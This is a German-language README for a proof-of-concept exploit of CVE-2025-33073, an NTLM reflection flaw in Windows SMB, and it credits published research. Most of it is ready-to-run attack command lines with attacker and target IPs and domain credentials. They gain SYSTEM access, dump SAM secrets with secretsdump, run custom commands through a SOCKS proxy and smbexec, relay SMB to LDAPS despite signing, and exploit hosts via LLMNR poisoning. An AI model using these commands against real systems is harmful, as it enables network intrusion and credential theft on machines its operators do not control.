
PoC Exploit für die NTLM-Reflexion-SMB-Sicherheitslücke.
PoC-Exploit für den NTLM-Reflection-SMB-Fehler.
Alle Credits gehen an die offizielle Forschung:
https://www.synacktiv.com/en/publications/ntlm-reflection-is-dead-long-live-ntlm-reflection-an-in-depth-analysis-of-cve-2025
Betriebssystem: Kali Linux (hat die meisten Pakete vorinstalliert).
Das Tool verwendet automatisch eine virtuelle Umgebung. Um es einzurichten, führen Sie Folgendes aus:
./setup.sh
Dadurch wird eine virtuelle Umgebung erstellt und alle erforderlichen Abhängigkeiten installiert, einschließlich ldap3-bleeding-edge==2.10.1.1337.
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65
Benutzerdefinierter Befehl
Anstatt secretsdump auszuführen, kann ein benutzerdefinierter Befehl ausgeführt werden.
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65 --custom-command "whoami"

SOCKS
Für eine verdecktere Ausführung von Befehlen nach erfolgreicher Verbindung als SYSTEM. --target und --target-ip sollten hier gleich sein.
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target 192.168.178.65 --target-ip 192.168.178.65 --socks
Außerdem kann ein benutzerdefinierter Befehl über proxychains ausgeführt werden, anstatt SAM zu dumpen.
proxychains nxc smb 192.168.178.65 -d '' -u '' -p '' -x 'whoami' --exec-method smbexec

Es wurden Nachforschungen durchgeführt, ob der Reflection wirklich nicht mit aktiviertem SMB-Signing funktioniert, was zur Entdeckung von Fehlern führte: Wenn SIGN/SEAL aus dem Paket entfernt werden, ist es möglich, von SMB zu LDAPS zu relayen, was aufgrund des MIC normalerweise nicht möglich ist.
Dank an:
python3 CVE-2025-33073.py -u "thewoods.local\test" -p 'pass' -d 192.168.204.131 --dns-ip 192.168.204.133 --dc-fqdn DC01.thewoods.local --target 192.168.204.133 --target-ip 192.168.204.133 -M DFSCoerce --smb-signing
Wenn Sie sich im selben Broadcast-Domain wie das Gerät befinden und es für LLMNR-Poisoning anfällig ist, ist es möglich, ein Gerät zu exploitieren, ohne einen DNS-Eintrag registrieren zu müssen.

Lokale NTLM-Authentifizierung findet statt

Lokale NTLM-Authentifizierung findet nicht statt, was zu einem FEHLGESCHLAGENEN Versuch führt

https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2025-33073